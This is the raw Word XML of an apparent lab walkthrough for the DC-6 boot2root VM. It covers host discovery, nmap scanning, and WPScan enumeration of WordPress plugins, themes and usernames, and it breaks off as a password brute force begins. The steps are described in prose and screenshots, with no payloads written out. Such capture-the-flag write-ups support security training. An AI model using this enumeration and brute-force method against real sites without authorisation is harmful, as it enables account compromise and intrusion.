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7568"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A56963" w14:paraId="402CF6C0" w14:textId="77777777" w:rsidTr="004001E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1444" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50DD691B" w14:textId="6326DB75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>Machine Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7572" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59161B95" w14:textId="39B8E1E4" w:rsidR="007433B8" w:rsidRPr="007433B8" w:rsidRDefault="00AE064F">
            <w:p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DC-6 is a boot2root VM where initial access comes from a misconfigured service or web app, leading to remote command execution, credential discovery, and local privilege escalation to root.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A56963" w14:paraId="4B59EB9D" w14:textId="77777777" w:rsidTr="004001E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1444" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1802F281" w14:textId="6F265237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>Target IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7572" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="441DEEAB" w14:textId="77888D9C" w:rsidR="007433B8" w:rsidRPr="007433B8" w:rsidRDefault="006D4347">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D4347">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.255.112.211</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A56963" w14:paraId="22DEEFA5" w14:textId="77777777" w:rsidTr="004001E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1444" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53B0C98A" w14:textId="45ACBE2E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7572" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61ACAE8C" w14:textId="77777777" w:rsidR="00AE064F" w:rsidRDefault="00AE064F">
            <w:p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 xml:space="preserve">Command Injection leading to Remote Code Execution (RCE)  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4030955D" w14:textId="144CCEF8" w:rsidR="007433B8" w:rsidRPr="007433B8" w:rsidRDefault="00AE064F">
            <w:p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Privilege Escalation due to Misconfigured Sudo Permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A56963" w14:paraId="6AADCE4F" w14:textId="77777777" w:rsidTr="004001E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1444" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D9C6521" w14:textId="5FF43041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>Service / Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7572" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53E09B2C" w14:textId="1A901F6F" w:rsidR="007433B8" w:rsidRPr="007433B8" w:rsidRDefault="00AE06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TCP / 80 HTPP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Word Press </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A56963" w14:paraId="4DC83C38" w14:textId="77777777" w:rsidTr="004001E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1444" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28D0990C" w14:textId="2255478C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 xml:space="preserve">CVSS Score / Severity </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7572" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="658C2DDC" w14:textId="7803E3CA" w:rsidR="007433B8" w:rsidRPr="007433B8" w:rsidRDefault="00AE06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A56963" w14:paraId="1FAC68A8" w14:textId="77777777" w:rsidTr="004001E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1444" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15BB0E62" w14:textId="25B99574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7572" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44237781" w14:textId="47235593" w:rsidR="007433B8" w:rsidRPr="007433B8" w:rsidRDefault="00AE06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CVSS3.0/</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE064F">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DFC7642" w14:textId="77777777" w:rsidR="004001E8" w:rsidRDefault="004001E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7585"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F218E6" w14:paraId="73CD62A6" w14:textId="77777777" w:rsidTr="004001E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1444" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AD7F040" w14:textId="43D8C4A3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lastRenderedPageBreak/>
              <w:t xml:space="preserve">Proof Of Concept </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7572" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09D13D06" w14:textId="686CFC40" w:rsidR="007433B8" w:rsidRDefault="007433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1 –</w:t>
            </w:r>
            <w:r w:rsidR="006D4347">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discover the IP of target using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="006D4347">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Netdiscover</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="006D4347">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> tool</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42838006" w14:textId="77777777" w:rsidR="006D4347" w:rsidRDefault="006D4347">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="46072B9D" w14:textId="70B98ED3" w:rsidR="006D4347" w:rsidRDefault="006D4347">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D4347">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19A9202D" wp14:editId="0F550E62">
                  <wp:extent cx="4616450" cy="2440940"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1226558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5586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44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BAC04" w14:textId="77777777" w:rsidR="006D4347" w:rsidRDefault="006D4347">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="52079FC6" w14:textId="6EED1EEA" w:rsidR="007433B8" w:rsidRDefault="007433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</w:t>
            </w:r>
            <w:r w:rsidR="006D4347">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">If we try to see web page it is not able to resolve domain name so lets add it in </w:t>
            </w:r>
            <w:r w:rsidR="006D4347" w:rsidRPr="006D4347">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/etc/hosts</w:t>
            </w:r>
            <w:r w:rsidR="006D4347">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> file </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="242209DF" w14:textId="77777777" w:rsidR="006D4347" w:rsidRDefault="006D4347">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="369FB766" w14:textId="77777777" w:rsidR="0093012F" w:rsidRDefault="0093012F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5AED6D01" w14:textId="115035C0" w:rsidR="00AF5033" w:rsidRDefault="00AF5033">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF5033">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D2ABF78" wp14:editId="271512FB">
                  <wp:extent cx="4578350" cy="3041650"/>
                  <wp:effectExtent l="0" t="0" r="0" b="6350"/>
                  <wp:docPr id="1994350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504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913D2" w14:textId="77777777" w:rsidR="00AF5033" w:rsidRDefault="00AF5033">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B2B327F" w14:textId="77777777" w:rsidR="0093012F" w:rsidRDefault="0093012F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="69F23214" w14:textId="2A4AE5AC" w:rsidR="00AF5033" w:rsidRDefault="00AF5033" w:rsidP="00AF503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Adding record so it can resolve locally </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C9847A9" w14:textId="77777777" w:rsidR="00AF5033" w:rsidRDefault="00AF5033" w:rsidP="00AF5033">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E3A8AEF" w14:textId="77777777" w:rsidR="0093012F" w:rsidRDefault="0093012F" w:rsidP="00AF5033">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3C4D14F5" w14:textId="084AC2DC" w:rsidR="00AF5033" w:rsidRPr="00AF5033" w:rsidRDefault="00AF5033" w:rsidP="00AF5033">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF5033">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37222D0B" wp14:editId="029FA762">
                  <wp:extent cx="4629150" cy="4043680"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="459394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3945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404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CCEBF" w14:textId="77777777" w:rsidR="006D4347" w:rsidRDefault="006D4347">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57ED2F74" w14:textId="7E6A9C57" w:rsidR="00AF5033" w:rsidRDefault="00AF5033" w:rsidP="00AF503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Successfully resolved domain to IP locally and we can access it now </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AC68429" w14:textId="77777777" w:rsidR="00AF5033" w:rsidRDefault="00AF5033" w:rsidP="00AF5033">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1FAC3656" w14:textId="77777777" w:rsidR="0093012F" w:rsidRDefault="0093012F" w:rsidP="00AF5033">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0F52DFE9" w14:textId="77777777" w:rsidR="0093012F" w:rsidRDefault="0093012F" w:rsidP="00AF5033">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B206988" w14:textId="7964AB02" w:rsidR="00AF5033" w:rsidRDefault="00AF5033">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF5033">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="531F96B1" wp14:editId="40A45ED8">
                  <wp:extent cx="4673600" cy="3218180"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1270"/>
                  <wp:docPr id="59345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4595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321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7D62B" w14:textId="77777777" w:rsidR="00AF5033" w:rsidRDefault="00AF5033">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0E6B1DEA" w14:textId="77777777" w:rsidR="0093012F" w:rsidRDefault="0093012F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="26EAAA33" w14:textId="109E251D" w:rsidR="007433B8" w:rsidRDefault="007433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</w:t>
            </w:r>
            <w:r w:rsidR="00AF5033">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discover Open ports and Services using Nmap</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34FCA77B" w14:textId="77777777" w:rsidR="00AF5033" w:rsidRDefault="00AF5033">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="528AE7DD" w14:textId="44B32E30" w:rsidR="00AF5033" w:rsidRDefault="00AF5033">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF5033">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28FFC71F" wp14:editId="0AC4D6E8">
                  <wp:extent cx="4673600" cy="2590800"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="191655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5597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F1592" w14:textId="77777777" w:rsidR="00AF5033" w:rsidRDefault="00AF5033">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="078053A4" w14:textId="77777777" w:rsidR="0093012F" w:rsidRDefault="0093012F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4C4CA8B8" w14:textId="03F41E77" w:rsidR="007433B8" w:rsidRDefault="007433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</w:t>
            </w:r>
            <w:r w:rsidR="00AF5033">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Look for files and directories on server </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32A2FA0D" w14:textId="77777777" w:rsidR="00AF5033" w:rsidRDefault="00AF5033">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3933AFF0" w14:textId="3CE8F7EB" w:rsidR="00AF5033" w:rsidRDefault="0093012F" w:rsidP="0093012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Files </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37227321" w14:textId="1A46CCF2" w:rsidR="0093012F" w:rsidRPr="0093012F" w:rsidRDefault="0093012F" w:rsidP="0093012F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0093012F">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29313077" wp14:editId="76B54502">
                  <wp:extent cx="4654550" cy="3026410"/>
                  <wp:effectExtent l="0" t="0" r="0" b="2540"/>
                  <wp:docPr id="538777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772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10EC9" w14:textId="77777777" w:rsidR="00AF5033" w:rsidRDefault="00AF5033">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="691041F8" w14:textId="410B1DE4" w:rsidR="0093012F" w:rsidRDefault="0093012F" w:rsidP="0093012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Directories </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E0155C9" w14:textId="77777777" w:rsidR="0093012F" w:rsidRDefault="0093012F" w:rsidP="0093012F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="75E8751C" w14:textId="352A9851" w:rsidR="0093012F" w:rsidRDefault="0093012F" w:rsidP="0093012F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0093012F">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E222036" wp14:editId="152521C2">
                  <wp:extent cx="4654550" cy="1961515"/>
                  <wp:effectExtent l="0" t="0" r="0" b="635"/>
                  <wp:docPr id="60400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014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E5962" w14:textId="77777777" w:rsidR="0093012F" w:rsidRDefault="0093012F" w:rsidP="0093012F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7BCAAEB0" w14:textId="528C94DE" w:rsidR="0093012F" w:rsidRPr="0093012F" w:rsidRDefault="0093012F" w:rsidP="009301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 we have Idea that we are dealing with WordPress CMS  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2706D445" w14:textId="77777777" w:rsidR="00AF5033" w:rsidRDefault="00AF5033">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="79C082F9" w14:textId="35B3D89D" w:rsidR="007433B8" w:rsidRDefault="007433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</w:t>
            </w:r>
            <w:r w:rsidR="0093012F">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Enumerating WordPress using WP-Scan</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="644718E6" w14:textId="77777777" w:rsidR="0093012F" w:rsidRDefault="0093012F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="268DC34F" w14:textId="5C0FE9B5" w:rsidR="0093012F" w:rsidRDefault="0093012F" w:rsidP="0093012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Enumerating Plugins </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48A8C1CB" w14:textId="77777777" w:rsidR="0093012F" w:rsidRDefault="0093012F" w:rsidP="0093012F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7CC630AD" w14:textId="16009571" w:rsidR="0093012F" w:rsidRPr="0093012F" w:rsidRDefault="0093012F" w:rsidP="0093012F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0093012F">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F71D3B6" wp14:editId="38CABD9F">
                  <wp:extent cx="4667250" cy="2062480"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="694015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153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8621F" w14:textId="77777777" w:rsidR="0093012F" w:rsidRDefault="0093012F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6E0A85B4" w14:textId="4AF91B4D" w:rsidR="0093012F" w:rsidRDefault="0093012F" w:rsidP="0093012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Enumerating Themes </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E787922" w14:textId="77777777" w:rsidR="0093012F" w:rsidRDefault="0093012F" w:rsidP="0093012F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="11D59E00" w14:textId="69C37270" w:rsidR="0093012F" w:rsidRPr="0093012F" w:rsidRDefault="00D40C85" w:rsidP="0093012F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D40C85">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A0A18BE" wp14:editId="6F705B84">
                  <wp:extent cx="4667250" cy="1839595"/>
                  <wp:effectExtent l="0" t="0" r="0" b="8255"/>
                  <wp:docPr id="84989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895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33835" w14:textId="77777777" w:rsidR="0093012F" w:rsidRDefault="0093012F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="29C47A48" w14:textId="4E7F0E91" w:rsidR="00D40C85" w:rsidRDefault="00D40C85" w:rsidP="00D40C8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Enumerating Users </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BC2E479" w14:textId="77777777" w:rsidR="00D40C85" w:rsidRDefault="00D40C85" w:rsidP="00D40C85">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4C92F6B2" w14:textId="4817AFFC" w:rsidR="00D40C85" w:rsidRDefault="00D40C85" w:rsidP="00D40C85">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D40C85">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FC73987" wp14:editId="2C8CE94E">
                  <wp:extent cx="4660900" cy="4060190"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:docPr id="1411481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4813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406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89DBB" w14:textId="77777777" w:rsidR="00D40C85" w:rsidRDefault="00D40C85" w:rsidP="00D40C85">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7AD8EFCE" w14:textId="77777777" w:rsidR="00191911" w:rsidRDefault="00191911" w:rsidP="00D40C85">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6025137F" w14:textId="45893C73" w:rsidR="00D40C85" w:rsidRDefault="00D40C85" w:rsidP="00D40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got some users ( </w:t>
            </w:r>
            <w:r w:rsidRPr="00D40C85">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">admin, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D40C85">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>sarah</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D40C85">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">, graham, mark, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D40C85">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>jens</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D40C85">
              <w:rPr>
                <w:color w:val="EE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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="514D5F0F" w14:textId="6D152327" w:rsidR="00D40C85" w:rsidRDefault="00D40C85" w:rsidP="00D40C85">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="69860AE5" w14:textId="77777777" w:rsidR="00191911" w:rsidRDefault="00191911" w:rsidP="00D40C85">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="17E0BEF4" w14:textId="6BFA995D" w:rsidR="00D40C85" w:rsidRDefault="00D40C85" w:rsidP="00D40C8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we verify them on login page we see “ Invalid Password  ”  error </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5288373B" w14:textId="77777777" w:rsidR="0093012F" w:rsidRDefault="0093012F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="779290EB" w14:textId="1CBE0E18" w:rsidR="00191911" w:rsidRDefault="00191911">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00191911">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="422F7287" wp14:editId="7103ADA4">
                  <wp:extent cx="4686300" cy="4535170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="863026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265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45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5190C" w14:textId="77777777" w:rsidR="00191911" w:rsidRDefault="00191911">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="503AEDFE" w14:textId="78CD7216" w:rsidR="007433B8" w:rsidRPr="00191911" w:rsidRDefault="007433B8">
            <w:pPr>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>STEP 6 –</w:t>
            </w:r>
            <w:r w:rsidR="00D40C85">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Let’s save all users in </w:t>
            </w:r>
            <w:r w:rsidR="00D40C85" w:rsidRPr="00191911">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Users.txt </w:t>
            </w:r>
            <w:r w:rsidR="00D40C85">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">and brute force using  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00D40C85">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Wp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00D40C85">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">-scan and wordlist we will use is </w:t>
            </w:r>
